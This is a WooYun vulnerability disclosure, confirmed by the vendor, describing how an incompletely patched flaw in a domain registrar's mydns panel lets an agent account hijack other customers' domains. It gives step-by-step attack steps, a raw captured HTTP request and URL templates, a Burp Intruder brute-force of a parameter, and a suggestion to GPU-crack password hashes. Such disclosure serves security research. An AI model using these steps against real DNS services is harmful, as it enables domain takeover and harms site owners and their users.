当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020061

漏洞标题:新网已补漏洞继续利用(使用mydns的所有域名劫持)

相关厂商:新网华通信息技术有限公司

漏洞作者: Finger

提交时间:2013-03-14 16:34

修复时间:2013-04-28 16:34

公开时间:2013-04-28 16:34

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-14: 细节已通知厂商并且等待厂商处理中
2013-03-18: 厂商已经确认,细节仅向厂商公开
2013-03-28: 细节向核心白帽子及相关领域专家公开
2013-04-07: 细节向普通白帽子公开
2013-04-17: 细节向实习白帽子公开
2013-04-28: 细节向公众公开

简要描述:

新网已补漏洞继续利用(使用mydns的所有域名劫持)

详细说明:

WooYun: 新网漏洞之主机管理越权和使用mydns的所有域名劫持
漏洞补了 但漏洞补的不够严谨
最重要的是 能够获取域名管理密码的MD5值始终是个漏洞(未补)
取得管理密码MD5值 即便没有其他地方来利用这个MD5密码 使用暴力碰撞解密MD5 获得域名的管理密码 登陆域名自主管理平台http://dcp.xinnet.com还是会对用户造成危害
新网域名管理密码系统随机生成的密码为8位大小写字母+数字的组合 现在用好点儿的显卡跑 组成集群去破解 应该不会太久 攻击一个大点儿的目标 跑几个月 一年都是值得的
言归正传 说说 WooYun: 新网漏洞之主机管理越权和使用mydns的所有域名劫持 未能修补的问题
http://mydns3.xinnet.com/mydns/recordsList.do?DomainName=xinnet.com&mystring=[MD5]&mystring2=[跟代理商有关的一个编号]
登陆新闻代理平台 进入【域名管理】=》【服务器商品】页面
在地址栏执行:javascript:submitDNSFormaaa('域名') 会打开一个域名管理页面
我们在【国际域名实名审核资料提交】中获取该域名管理密码的md5值留用
在代理商域名管理页面随便打开一个域名的Mydns 用Burp代理截取

GET /mydns/recordsList.do?DomainName=xinnet.com&mystring=[MD5]&mystring2=[跟代理商有关的一个编号] HTTP/1.1
Accept: */*
Referer: http://agent.xinnet.com/domain/manage.do?method=list&serviceState=02&forward=inusing
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Cookie:
cookie内容
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: mydns3.xinnet.com


发送至intruder 将域名和MD5替换成攻击目标的 我们来猜解mystring2的值
mystring2一般为136开头共7位
猜解出mystring2的值之后
我们在一个已经打开的域名mydns管理页面直接输入url(利用该cookie):
http://mydns3.xinnet.com/mydns/recordsList.do?DomainName=[目标域名]&mystring=[目标域名的MD5]&mystring2=[跟代理商有关的一个编号]
这样就进入了目标域名的Mydns管理页面
之后劫持吧 伙计!
说明可能有点儿乱 如果不能复现 可以联系我。

漏洞证明:

漏洞受害者由新网出演:
我们的目标:xinnet.com

_20130314161209.jpg


_20130314162642.jpg


_20130314162745.jpg


_20130314163040.jpg


修复方案:

版权声明:转载请注明来源 Finger@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-18 14:02

厂商回复:

非常感谢!漏洞报告已收到

最新状态:

暂无